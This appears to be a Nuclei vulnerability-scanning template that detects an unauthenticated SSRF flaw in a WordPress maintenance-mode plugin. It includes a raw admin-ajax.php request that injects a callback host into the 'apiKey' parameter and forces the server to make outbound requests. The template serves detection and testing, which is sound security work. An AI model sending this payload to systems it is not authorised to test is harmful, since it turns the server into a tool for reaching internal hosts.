id: wp-under-construction-ssrf

info:
  name: Under Construction, Coming Soon & Maintenance Mode < 1.1.2 - Server Side Request Forgery (SSRF)
  author: Akincibor
  severity: high
  description: |
    The includes/mc-get_lists.php file used the 'apiKey' POST parameter to create an https URL from it without sanitisation and called it with cURL, leading to a SSRF issue. The issue is exploitable via direct access to the affected file, and ucmm_mc_api AJAX call (available to both authenticated and unauthenticated users).
  reference:
    - https://wpscan.com/vulnerability/24784c84-3efd-4166-81c1-e5a266562cfc
    - https://packetstormsecurity.com/files/161576/
  metadata:
    verified: true
    max-request: 2
  tags: ssrf,wp,wp-plugin,wordpress,unauth,wpscan,packetstorm

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/under-construction-maintenance-mode/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        internal: true
        words:
          - '= Under Construction'

  - raw:
      - |
        POST /wp-admin/admin-ajax.php HTTP/2
        Host: {{Hostname}}
        Origin: {{BaseURL}}
        Content-Type: application/x-www-form-urlencoded

        action=ucmm_mc_api&apiKey=-{{interactsh-url}}%2Ftest%2Ftest%2Ftest%3Fkey1%3Dval1%26dummy%3D

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 4a0a00473045022100de329b56084478c52fe5e9486534219e0199fdc6083e77efddb8e386d8952aa002205991e2e7fb724017b0048843386378c380a484cd01a119e8f9bb0cd44f3adfa5:922c64590222798bb761d5b6d8e72950